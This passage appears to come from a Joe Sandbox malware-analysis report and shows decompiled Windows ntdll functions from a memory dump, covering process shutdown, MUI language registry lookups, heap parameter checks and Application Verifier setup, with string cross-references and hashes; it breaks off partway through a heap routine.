					 *((intOrPtr*)(_t141 - 0x78)) = 0x24;
					 *((intOrPtr*)(_t141 - 0x74)) = 1;
					_t108 = 7;
					memset(_t141 - 0x70, 0, _t108 << 2);
					_t47 = _t119 + 0x48; // 0x0
					E3418DC40(_t141 - 0x78,  *_t47);
					 *((intOrPtr*)(_t141 - 4)) = 1;
					_t121 =  *0x34265b24; // 0x3f22cc8
					E3418F0A3(_t99, 0, _t121, _t141 - 0x70 + _t108, 1, __eflags);
					 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
					L3419D88F();
				}
				goto L15;
			}

0x3419d6d0
0x3419d6d2
0x3419d6d7
0x3419d6dc
0x3419d6e3
0x3419d6ed
0x3419d810
0x3419d813
0x3419d81f
0x3419d81f
0x3419d6f3
0x3419d6f9
0x3419d6fc
0x3419d6ff
0x3419d702
0x3419d709
0x341df0c2
0x341df0c2
0x3419d716
0x341df0cd
0x341df0e7
0x341df0ec
0x341df0ec
0x3419d71c
0x3419d71f
0x3419d724
0x3419d732
0x3419d86d
0x3419d873
0x3419d875
0x3419d877
0x3419d879
0x3419d87f
0x3419d87f
0x3419d738
0x3419d740
0x3419d742
0x3419d744
0x3419d744
0x3419d750
0x341df0f4
0x341df0f7
0x341df0fe
0x341df101
0x341df108
0x341df10b
0x341df10d
0x00000000
0x00000000
0x341df113
0x341df117
0x3419d7ed
0x3419d7ed
0x3419d7f3
0x3419d7fa
0x341df13c
0x341df13f
0x341df145
0x341df14a
0x341df14a
0x341df13f
0x3419d800
0x3419d804
0x3419d806
0x3419d806
0x3419d80b
0x00000000
0x3419d80b
0x3419d756
0x3419d756
0x3419d75a
0x3419d75d
0x3419d766
0x3419d76c
0x3419d76e
0x3419d76e
0x3419d771
0x3419d774
0x3419d774
0x3419d777
0x3419d77a
0x3419d77a
0x3419d77d
0x3419d782
0x3419d78d
0x3419d794
0x3419d799
0x3419d79f
0x3419d79f
0x3419d7a1
0x3419d7a7
0x3419d7ac
0x3419d7af
0x3419d7b2
0x3419d7b6
0x3419d7da
0x3419d7da
0x3419d7b8
0x3419d7b9
0x3419d7c0
0x3419d7c5
0x3419d7cc
0x3419d7cf
0x3419d7cf
0x00000000
0x3419d782
0x3419d7e1
0x3419d7e7
0x3419d7eb
0x3419d820
0x3419d827
0x3419d82c
0x3419d832
0x3419d834
0x3419d83a
0x3419d83f
0x3419d842
0x3419d84a
0x3419d84f
0x3419d856
0x3419d856
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 3419D879

Part of subcall function 34174779: RtlDebugPrintTimes.NTDLL ref: 34174817

Strings

minkernel\ntdll\ldrinit.c, xrefs: 341DF0E2
Process 0x%p (%wZ) exiting, xrefs: 341DF0D1
LdrShutdownProcess, xrefs: 341DF0D8
$, xrefs: 3419D78D
$, xrefs: 3419D820

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1975516107
Opcode ID: 3db1a7342489be37465dacb2b170a088ead5c72533a38688dcd3c20be19fbd23
Instruction ID: be8e96017c9226ac165f3e655ce77569a0975411dfa86d8100031775a7d8a2e2
Opcode Fuzzy Hash: 3db1a7342489be37465dacb2b170a088ead5c72533a38688dcd3c20be19fbd23
Instruction Fuzzy Hash: 7C519CB6A04B45DFEB04CB68C5C47D9BBF2BB44308F548199D400BB291DBB4A986CFD0

Uniqueness

Uniqueness Score: -1.00%

Function 3416D02D Relevance: 10.2, Strings: 8, Instructions: 249
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E3416D02D(void* __ecx, intOrPtr* __edx, intOrPtr _a4) {
				char* _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				char _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v96;
				char* _v100;
				intOrPtr _v104;
				char _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char* _v124;
				signed int _v128;
				char _v132;
				char _v140;
				signed int _v144;
				char _v145;
				char _v148;
				signed int _v152;
				void* _v156;
				void* _v157;
				signed int _v160;
				void* _v161;
				signed int _v164;
				signed int _v168;
				void* _v172;
				void* _v180;
				void* _v188;
				intOrPtr _t111;
				void* _t128;
				void* _t160;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr* _t179;
				void* _t182;
				char _t184;
				signed int _t185;
				void* _t187;
				void* _t196;

				_t187 = (_t185 & 0xfffffff8) - 0x9c;
				_t160 = __ecx;
				_t179 = __edx;
				_v128 = 0;
				_v160 = 0;
				_v144 = 0;
				_v152 = 0;
				if(__edx == 0 || _a4 == 0) {
					_t182 = 0xc000000d;
					goto L11;
				} else {
					_v128 =  *__edx;
					E341B5050(__ecx,  &_v140, L"\\Registry\\Machine\\Software\\Policies\\Microsoft\\MUI\\Settings");
					_t184 = 0x18;
					_v132 = _t184;
					_v124 =  &_v148;
					_v128 = 0;
					_push( &_v132);
					_push(0x20019);
					_v120 = 0x40;
					_push( &_v168);
					_v116 = 0;
					_v112 = 0;
					if(L341B2AB0() >= 0) {
						_t182 = E3422ADD6(_v160, _a4,  &_v145,  &_v132);
						if(_t182 >= 0) {
							L11:
							if(_v160 != 0) {
								_push(_v160);
								E341B2A80();
							}
							if(_v144 != 0) {
								_push(_v144);
								E341B2A80();
							}
							if(_v152 != 0) {
								_push(_v152);
								E341B2A80();
							}
							if(_t182 < 0) {
								if(_t179 == 0) {
									goto L19;
								}
								_t162 = _v128;
								if( *_t179 == _t162) {
									goto L19;
								}
								if( *_t179 != 0) {
									L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *_t179);
								}
								goto L44;
							} else {
								if( *_t179 != 0) {
									L19:
									return _t182;
								}
								_t111 = L3416DAA8(1);
								 *_t179 = _t111;
								if(_t111 == 0) {
									_t162 = _v128;
									_t182 = 0xc0000017;
									L44:
									 *_t179 = _t162;
								}
								goto L19;
							}
						}
						if(_t160 == 8) {
							 *((char*)(_t187 + 0x13)) = 0;
							if(E3422AD61(_v160, _t187 + 0x13) == 0 &&  *((char*)(_t187 + 0x13)) == 1) {
								_t160 = 4;
							}
						}
						_push(_v160);
						E341B2A80();
						_v164 = _v164 & 0x00000000;
						_t184 = 0x18;
					}
					_t170 = 0x2000000;
					if(E3416D736(0x2000000,  &_v152) < 0) {
						_v152 = _v152 & 0x00000000;
					}
					if(_t160 != 8) {
						if(_t160 != 4) {
							goto L25;
						}
						if(_v152 == 0) {
							_t128 = 0xc0000034;
						} else {
							E341B5050(_t170,  &_v140, L"Control Panel\\Desktop\\MuiCached\\MachineLanguageConfiguration");
							_v168 = _v168 & 0x00000000;
							_v44 = _v44 & 0x00000000;
							_v40 = _v40 & 0x00000000;
							_v56 = _v160;
							_v52 =  &_v148;
							_push( &_v60);
							_push(0x20019);
							_v60 = _t184;
							_push( &_v168);
							_v48 = 0x40;
							_t128 = L341B2AB0();
						}
						if(_t128 < 0) {
							E341B5050(_t170,  &_v140, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\MUI\\Settings\\LanguageConfiguration");
							_v168 = _v168 & 0x00000000;
							_v32 = _v32 & 0x00000000;
							 *(_t187 + 0xa0) =  *(_t187 + 0xa0) & 0x00000000;
							 *(_t187 + 0xa4) =  *(_t187 + 0xa4) & 0x00000000;
							_v28 =  &_v148;
							_push( &_v36);
							_push(0x20019);
							_v36 = _t184;
							_push( &_v168);
							 *((intOrPtr*)(_t187 + 0xa8)) = 0x40;
							_t182 = L341B2AB0();
							if(_t182 < 0) {
								goto L9;
							}
						}
						goto L25;
					} else {
						if(_v152 == 0) {
							L10:
							_t182 = 0;
							goto L11;
						}
						E341B5050(_t170,  &_v140, L"Software\\Policies\\Microsoft\\Control Panel\\Desktop");
						_v92 = _v92 & 0x00000000;
						_v88 = _v88 & 0x00000000;
						_v104 = _v160;
						_t164 = 0x40;
						_v100 =  &_v148;
						_push( &_v108);
						_push(0x20019);
						_v108 = _t184;
						_push( &_v152);
						_v96 = _t164;
						if(L341B2AB0() >= 0) {
							_t170 = _v144;
							_t182 = E3422ADD6(_v144, _a4,  &_v145,  &_v132);
							if(_t182 >= 0) {
								goto L11;
							}
							_t184 = 0x18;
						}
						E341B5050(_t170,  &_v140, L"Control Panel\\Desktop\\LanguageConfiguration");
						_v168 = _v168 & 0x00000000;
						_v68 = _v68 & 0x00000000;
						_v64 = _v64 & 0x00000000;
						 *((intOrPtr*)(_t187 + 0x64)) = _v160;
						 *((intOrPtr*)(_t187 + 0x68)) =  &_v148;
						_push( &_v84);
						_push(0x20019);
						_v84 = _t184;
						_push( &_v168);
						_v72 = _t164;
						_t182 = L341B2AB0();
						if(_t182 >= 0) {
							L25:
							_t182 = L3416D9A2(_v160, _t179, _a4);
							goto L11;
						} else {
							_t196 = _t182 - 0xc0000034;
							L9:
							if(_t196 != 0) {
								goto L11;
							}
							goto L10;
						}
					}
				}
			}

0x3416d035
0x3416d03f
0x3416d042
0x3416d044
0x3416d048
0x3416d04c
0x3416d050
0x3416d056
0x341ca5a1
0x00000000
0x3416d065
0x3416d067
0x3416d075
0x3416d07c
0x3416d081
0x3416d085
0x3416d08f
0x3416d093
0x3416d094
0x3416d09d
0x3416d0a5
0x3416d0a6
0x3416d0aa
0x3416d0b5
0x341ca52a
0x341ca52e
0x3416d194
0x3416d199
0x3416d19b
0x3416d19f
0x3416d19f
0x3416d1a9
0x341ca5ab
0x341ca5af
0x341ca5af
0x3416d1b4
0x3416d1b6
0x3416d1ba
0x3416d1ba
0x3416d1c1
0x341ca5bb
0x00000000
0x00000000
0x341ca5c1
0x341ca5c7
0x00000000
0x00000000
0x341ca5d0
0x341ca5df
0x341ca5df
0x00000000
0x3416d1c7
0x3416d1ca
0x3416d1de
0x3416d1e6
0x3416d1e6
0x3416d1cf
0x3416d1d4
0x3416d1d8
0x341ca5e6
0x341ca5ea
0x341ca5ef
0x341ca5ef
0x341ca5ef
0x00000000
0x3416d1d8
0x3416d1c1
0x341ca537
0x341ca541
0x341ca54d
0x341ca558
0x341ca558
0x341ca54d
0x341ca559
0x341ca55d
0x341ca562
0x341ca569
0x341ca569
0x3416d0bf
0x3416d0cc
0x341ca56f
0x341ca56f
0x3416d0d5
0x3416d1ec
0x00000000
0x00000000
0x3416d1fc
0x3416d2de
0x3416d202
0x3416d20c
0x3416d215
0x3416d21a
0x3416d222
0x3416d22a
0x3416d232
0x3416d23d
0x3416d23e
0x3416d247
0x3416d24e
0x3416d24f
0x3416d25a
0x3416d25a
0x3416d261
0x3416d26d
0x3416d272
0x3416d27b
0x3416d283
0x3416d28b
0x3416d293
0x3416d2a1
0x3416d2a2
0x3416d2ab
0x3416d2b2
0x3416d2b3
0x3416d2c3
0x3416d2c7
0x00000000
0x3416d2e5
0x3416d2c7
0x00000000
0x3416d0db
0x3416d0e0
0x3416d192
0x3416d192
0x00000000
0x3416d192
0x3416d0f0
0x3416d0f9
0x3416d0fe
0x3416d103
0x3416d10d
0x3416d10e
0x3416d116
0x3416d117
0x3416d120
0x3416d124
0x3416d125
0x3416d130
0x341ca580
0x341ca58f
0x341ca593
0x00000000
0x00000000
0x341ca59b
0x341ca59b
0x3416d140
0x3416d149
0x3416d14e
0x3416d153
0x3416d158
0x3416d160
0x3416d168
0x3416d169
0x3416d172
0x3416d176
0x3416d177
0x3416d180
0x3416d184
0x3416d2c9
0x3416d2d7
0x00000000
0x3416d18a
0x3416d18a
0x3416d190
0x3416d190
0x00000000
0x00000000
0x00000000
0x3416d190
0x3416d184
0x3416d0d5

Strings

@, xrefs: 3416D09D
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3416D0E6
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3416D263
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3416D202
@, xrefs: 3416D2B3
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3416D06F
@, xrefs: 3416D24F
Control Panel\Desktop\LanguageConfiguration, xrefs: 3416D136

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-1356375266
Opcode ID: 6503d219757d964c5f62aeb12056e07c7dc010617fc2ac59a080f9d3d83ece46
Instruction ID: 3d6478a85e04e2661a24dce96ccac7be2a99559a25a530395ab39fc6a46cb2dd
Opcode Fuzzy Hash: 6503d219757d964c5f62aeb12056e07c7dc010617fc2ac59a080f9d3d83ece46
Instruction Fuzzy Hash: 36A16CB1508B45DFE721CF20C8C4B5BB7E8AB84759F01892EF999A6240D778D908CF93

Uniqueness

Uniqueness Score: -1.00%

Function 3421F51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON

Download Yara Rule

Strings

Specified HeapBase (%p) != to BaseAddress (%p), xrefs: 3421F6B2
HEAP[%wZ]: , xrefs: 3421F552, 3421F597, 3421F5E3, 3421F648, 3421F696, 3421F6DD
HEAP: , xrefs: 3421F55F, 3421F5A4, 3421F5F0, 3421F655, 3421F6A3, 3421F6EA
Specified HeapBase (%p) is free or not writable, xrefs: 3421F6F8
Specified HeapBase (%p) invalid, Status = %lx, xrefs: 3421F664
Invalid CommitSize parameter - %Ix, xrefs: 3421F5B2
May not specify Lock parameter with HEAP_NO_SERIALIZE, xrefs: 3421F5FB
Invalid ReserveSize parameter - %Ix, xrefs: 3421F56B

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
API String ID: 0-2224505338
Opcode ID: be11360cda76431114a887cb82d72c86d188c82ba79d442e331a5f126d6177a3
Instruction ID: 097bb99d11b4b78654900a0814dd9ed789baedbeb20c66f634d085282a17c4f4
Opcode Fuzzy Hash: be11360cda76431114a887cb82d72c86d188c82ba79d442e331a5f126d6177a3
Instruction Fuzzy Hash: D4510776111A85EFE301CF64C8C4F5A77F5EB086A4F12849EF923AB613CA39D960CE54

Uniqueness

Uniqueness Score: -1.00%

Function 341F8633 Relevance: 9.0, Strings: 7, Instructions: 259
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E341F8633(char __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				intOrPtr _v0;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				char _v28;
				char _v29;
				signed int _v30;
				char _v31;
				intOrPtr _v32;
				signed int _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t50;
				signed int _t51;
				signed int _t52;
				intOrPtr _t69;
				signed int _t76;
				signed int _t88;
				intOrPtr _t92;
				signed int _t97;
				signed int _t103;
				signed int _t121;
				intOrPtr* _t124;
				intOrPtr _t126;
				signed int _t127;
				signed int _t128;
				intOrPtr* _t130;

				_t115 = __edx;
				_t103 = __ecx;
				_t97 = 0;
				_v8 = __edx;
				_v31 = __ecx;
				_t126 =  *[fs:0x30];
				_v12 = _t126;
				_v24 = 0;
				_v28 = 0;
				_t50 = _a8;
				if(_t50 == 0) {
					_t121 = _a16;
					__eflags = _t121;
					if(_t121 != 0) {
						 *_t121 = 0;
						__eflags =  *(_t126 + 0x68) & 0x02000100;
						if(( *(_t126 + 0x68) & 0x02000100) == 0) {
							_t51 = E341F36EC();
							_t103 = _v31;
							__eflags = _t51;
							if(_t51 != 0) {
								_v28 = 2;
							}
						} else {
							_v28 = 1;
						}
						__eflags =  *(_t126 + 0x68) & 0x00000100;
						if(( *(_t126 + 0x68) & 0x00000100) != 0) {
							L35:
							_t52 = 0x48004;
							goto L36;
						} else {
							__eflags = _t103;
							if(_t103 != 0) {
								goto L35;
							}
							_t52 = 0;
							L36:
							_t127 = _a4;
							 *0x34265a74 = _t52;
							 *0x34265000 = 0;
							__eflags = _t127;
							if(_t127 == 0) {
								L40:
								__eflags = _v31;
								if(_v31 != 0) {
									 *0x34265238 = 1;
								}
								L42:
								__eflags = _t127;
								if(__eflags != 0) {
									__eflags = _t52 & 0x00000004;
									if((_t52 & 0x00000004) != 0) {
										E34166CC0(_t127, L"HandleTraces", 4, 0x342669d8, 4, 0);
									}
									E34166CC0(_t127, L"VerifierDebug", 4, 0x342669dc, 4, 0);
									E34166CC0(_t127, L"VerifierDlls", 1, 0x34265000, 0x200, 0);
								}
								_t116 = _v8;
								_t128 = L341F98B2(0x34141b98, _v8, __eflags, _t127, _a12, 0x34265260);
								__eflags = _t128;
								if(_t128 >= 0) {
									 *_t121 = 0x34265260;
									_t128 = E341F8FBB();
									__eflags = _t128;
									if(_t128 >= 0) {
										E341A1D66(0x34141b98, _t116, 0);
										 *0x34269234 = _v32;
										E341A1D66(0x34141b98, _t116, 1);
									}
								}
								L49:
								return _t128;
							}
							E34166CC0(_t127, L"VerifierFlags", 4,  &_v24, 4, 0);
							_t52 = _v48;
							__eflags = _t52;
							if(_t52 == 0) {
								_t52 =  *0x34265a74; // 0x0
								goto L40;
							}
							 *0x34265a74 = _t52;
							goto L42;
						}
					}
					_t128 = 0xc000000d;
					goto L49;
				}
				if(_t50 != 1) {
					L25:
					_t128 = _t97;
					goto L49;
				}
				 *0x34265244 = 0x34265240;
				 *0x34265240 = 0x34265240;
				_t128 = L3419FBC0(0x34265220, 0, 0);
				if(_t128 < 0) {
					goto L49;
				}
				if( *0x34269234 == 2) {
					_v29 = 0;
					_t128 = L34191934(0x34265308, 0,  &_v29);
					__eflags = _t128;
					if(_t128 < 0) {
						goto L49;
					}
					goto L25;
				}
				_push( *0x34265a74);
				_push( *((intOrPtr*)( *[fs:0x18] + 0x20)));
				_t69 =  *0x34265d8c; // 0x3f22cc8
				_t8 = _t69 + 0x30; // 0x3f21d08
				E341FEF10(0x5d, 0, "AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled\n",  *_t8);
				if(E341F9429(_t115) >= 0) {
					_t130 =  *0x34265240; // 0x0
					while(1) {
						__eflags = _t130 - 0x34265240;
						if(__eflags == 0) {
							break;
						}
						_t71 = E341F919C(_t97, _t130, 0x34265240, _t130, __eflags);
						__eflags = _t71;
						if(_t71 == 0) {
							_t128 = 0xc0000142;
							goto L49;
						} else {
							_t130 =  *_t130;
							continue;
						}
					}
					L341F8B5E(_t71);
					_t108 = 0x34141b88;
					_t128 = E3418F380(0x34141b88, 0, _t97,  &_v20, _t97);
					__eflags = _t128;
					if(_t128 < 0) {
						__eflags = _t128 - 0xc0000135;
						if(_t128 != 0xc0000135) {
							goto L49;
						}
						_t131 =  *0x34265278; // 0x0
						L15:
						_t76 = E3418CF00(_t108, 0, _t131, 0x34141b90, 0,  &_v16, 1, _v0);
						E341A1D66(_t108, 0, 0);
						__eflags = _t76;
						if(_t76 >= 0) {
							_t88 =  *0x7ffe0330;
							_t108 = _t88 & 0x0000001f;
							__eflags = _t88 & 0x0000001f;
							asm("ror eax, cl");
							 *0x34269238 = _t88 ^ _v16;
							 *0x34269230 = 1;
						}
						 *0x34269231 = 1;
						 *0x34269232 = 1;
						E341F964A(E341A1D66(_t108, 0, 1));
						_t124 =  *0x34265240; // 0x0
						_t97 = 0;
						__eflags = 0;
						while(1) {
							__eflags = _t124 - 0x34265240;
							if(_t124 == 0x34265240) {
								break;
							}
							_v30 = _t97;
							_t128 = L34191934( *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x10)) + 0x50)), 0,  &_v30);
							__eflags = _t128;
							if(_t128 < 0) {
								goto L49;
							}
							_t124 =  *_t124;
						}
						__eflags =  *0x342669dc & 0x00000008;
						if(( *0x342669dc & 0x00000008) != 0) {
							_push("AVRF: -*- final list of providers -*- \n");
							E341F8EB8(L3416B910());
						}
						E341F9818();
						E3417E580(3,  *((intOrPtr*)(_v12 + 8)), _t97, _t97,  &_v28);
						goto L25;
					}
					_t108 = _v20;
					_t131 =  *((intOrPtr*)(_v20 + 0x18));
					E3418D3E1(_t97, _v20,  *((intOrPtr*)(_v20 + 0x18)));
					goto L15;
				} else {
					_push( *((intOrPtr*)( *[fs:0x18] + 0x20)));
					_t92 =  *0x34265d8c; // 0x3f22cc8
					_t10 = _t92 + 0x30; // 0x3f21d08
					E341FEF10(0x5d, 0, "AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.\n",  *_t10);
					_t128 = 0xc0000001;
					 *( *[fs:0x30] + 0x68) =  *( *[fs:0x30] + 0x68) & 0xfffffeff;
					goto L49;
				}
			}

0x341f8633
0x341f8633
0x341f8642
0x341f8644
0x341f8648
0x341f864d
0x341f8654
0x341f8658
0x341f865c
0x341f8661
0x341f8663
0x341f8861
0x341f8864
0x341f8866
0x341f8872
0x341f8877
0x341f887e
0x341f8886
0x341f888b
0x341f888f
0x341f8891
0x341f8893
0x341f8893
0x341f8880
0x341f8880
0x341f8880
0x341f889b
0x341f88a2
0x341f88ac
0x341f88ac
0x00000000
0x341f88a4
0x341f88a4
0x341f88a6
0x00000000
0x00000000
0x341f88a8
0x341f88b1
0x341f88b1
0x341f88b6
0x341f88bb
0x341f88c2
0x341f88c4
0x341f88ef
0x341f88ef
0x341f88f4
0x341f88f6
0x341f88f6
0x341f88fc
0x341f88fc
0x341f88fe
0x341f8900
0x341f8902
0x341f8915
0x341f8915
0x341f892b
0x341f8943
0x341f8943
0x341f8948
0x341f895f
0x341f8961
0x341f8963
0x341f8965
0x341f8970
0x341f8972
0x341f8974
0x341f8978
0x341f8982
0x341f8987
0x341f8987
0x341f8974
0x341f898c
0x341f8994
0x341f8994
0x341f88d6
0x341f88db
0x341f88df
0x341f88e1
0x341f88ea
0x00000000
0x341f88ea
0x341f88e3
0x00000000
0x341f88e3
0x341f88a2
0x341f8868
0x00000000
0x341f8868
0x341f866c
0x341f885a
0x341f885a
0x00000000
0x341f885a
0x341f867e
0x341f8684
0x341f868f
0x341f8693
0x00000000
0x00000000
0x341f86a0
0x341f883f
0x341f8850
0x341f8852
0x341f8854
0x00000000
0x00000000
0x00000000
0x341f8854
0x341f86a6
0x341f86b2
0x341f86b5
0x341f86ba
0x341f86c5
0x341f86d4
0x341f8719
0x341f872e
0x341f872e
0x341f8730
0x00000000
0x00000000
0x341f8723
0x341f8728
0x341f872a
0x341f875e
0x00000000
0x341f872c
0x341f872c
0x00000000
0x341f872c
0x341f872a
0x341f8732
0x341f8740
0x341f874a
0x341f874c
0x341f874e
0x341f8768
0x341f876e
0x00000000
0x00000000
0x341f8774
0x341f877a
0x341f878e
0x341f8797
0x341f879c
0x341f879e
0x341f87a0
0x341f87ab
0x341f87ab
0x341f87ae
0x341f87b0
0x341f87b5
0x341f87b5
0x341f87bc
0x341f87c2
0x341f87cd
0x341f87d2
0x341f87d8
0x341f87d8
0x341f87da
0x341f87da
0x341f87e0
0x00000000
0x00000000
0x341f87ec
0x341f87f8
0x341f87fa
0x341f87fc
0x00000000
0x00000000
0x341f8802
0x341f8802
0x341f8806
0x341f880d
0x341f880f
0x341f881a
0x341f881a
0x341f881f
0x341f8834
0x00000000
0x341f8834
0x341f8750
0x341f8754
0x341f8757
0x00000000
0x341f86d6
0x341f86dc
0x341f86df
0x341f86e4
0x341f86ef
0x341f86fd
0x341f8711
0x00000000
0x341f8711

Strings

HandleTraces, xrefs: 341F890F
AVRF: -*- final list of providers -*- , xrefs: 341F880F
VerifierFlags, xrefs: 341F88D0
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 341F86E7
VerifierDebug, xrefs: 341F8925
VerifierDlls, xrefs: 341F893D
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 341F86BD

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: f88e0ed3fe2c6fe44562947414cf646f1430a1804d89f95656a2db70cc837c0c
Instruction ID: 05a4c27d4f8c3a9e51bb388edc604b2901cd62bb0344ca446128df294c368de3
Opcode Fuzzy Hash: f88e0ed3fe2c6fe44562947414cf646f1430a1804d89f95656a2db70cc837c0c
Instruction Fuzzy Hash: 1F910372640F11EFE311CF288CC0B5ABBAAEB40758F854698F9417B250CBB6DC56CB95

Uniqueness

Uniqueness Score: -1.00%

Function 3416F113 Relevance: 8.2, Strings: 6, Instructions: 684
COMMONCrypto

Download Yara Rule

C-Code - Quality: 65%

			E3416F113(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				void* _v56;
				intOrPtr _v60;
				void* _v68;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t242;
				signed char _t243;
				signed short _t245;
				signed int _t247;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				intOrPtr _t255;
				signed int _t265;
				signed int _t274;
				signed int _t277;
				intOrPtr _t278;
				signed int _t279;
				signed int _t302;
				signed short _t308;
				intOrPtr _t312;
				signed int _t323;
				signed int _t328;
				signed int _t331;
				intOrPtr _t332;
				signed int _t334;
				signed int _t336;
				signed int _t337;
				signed int _t340;
				intOrPtr _t341;
				intOrPtr _t350;
				signed int _t354;
				signed int _t357;
				intOrPtr _t358;
				signed int _t359;
				signed int _t378;
				signed short _t386;
				intOrPtr _t388;
				intOrPtr _t399;
				unsigned int _t415;
				signed int _t424;
				signed int _t427;
				signed int _t431;
				signed int _t439;
				signed short _t440;
				signed short _t443;
				signed int _t447;
				signed short* _t453;
				void* _t461;
				signed int _t472;
				signed int _t473;
				signed int _t475;
				intOrPtr _t476;
				signed int _t483;
				void* _t485;
				signed short _t496;
				unsigned int _t502;
				unsigned int _t504;
				signed int _t509;
				signed int _t514;
				signed short* _t524;
				signed int _t535;
				signed int _t537;
				signed int _t540;
				unsigned int _t545;
				signed int _t547;

				_t444 = __ecx;
				_t547 = __ecx;
				_t533 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x34266d48) != 0) {
					_push(_a4);
					_t509 = __edx;
					L11:
					_t242 = L34180B10(_t444, _t509);
					L7:
					return _t242;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x240)) =  *((intOrPtr*)(__ecx + 0x240)) - 1;
						_t424 = E3416F858(__edx,  &_v12,  &_v16);
						__eflags = _t424;
						if(_t424 != 0) {
							_t135 = _t547 + 0x244;
							 *_t135 =  *(_t547 + 0x244) - _v16;
							__eflags =  *_t135;
						}
					}
					_t439 = _a4;
					_t509 = _t533;
					_v44 = _t533;
					L14:
					_t243 =  *((intOrPtr*)(_t533 + 6));
					__eflags = _t243;
					if(_t243 == 0) {
						_t535 = _t547;
					} else {
						_t535 = (_t533 & 0xffff0000) - ((_t243 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t535;
					}
					_t245 = 7 + _t439 * 8 + _t509;
					_v12 = _t245;
					__eflags =  *_t245 - 3;
					if( *_t245 == 3) {
						_v16 = _t509 + _t439 * 8 + 8;
						E34169E69(_t547, _t509 + _t439 * 8 + 8);
						_t496 = _v16;
						_v28 =  *(_t496 + 0x10);
